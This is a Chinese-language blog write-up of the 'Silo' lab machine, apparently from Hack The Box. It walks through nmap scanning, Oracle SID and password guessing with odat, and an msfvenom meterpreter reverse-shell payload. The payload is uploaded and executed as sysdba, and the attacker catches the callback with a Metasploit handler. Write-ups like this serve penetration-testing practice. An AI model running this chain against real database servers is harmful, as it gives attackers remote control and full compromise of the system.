Silo

Posted by on 2020年2月24日


Silo

nmap扫描端口

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.82 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.10.10.82

file

1521->oracle数据库

漏洞利用

下载odat

apt-get install odat

odat扫描sid

odat sidguesser -s 10.10.10.82 -p 1521

file

git clone https://github.com/quentinhardy/odat
cd odat
python3 -m pip install cx_Oracle
./odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts/accounts_small.txt(需要小写所有的字典字母)

file

msf生成reverse shell

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.45 lport=4444 -f exe > writeup.exe

file

上传文件

./odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ writeup.exe writeup.exe

file

msf监听

use exploit/multi/handler
set lhost 10.10.14.45
set lport 4444
run

执行文件

./odat.py externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ writeup.exe

file
file

get user.txt|root.txt

file
file




发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据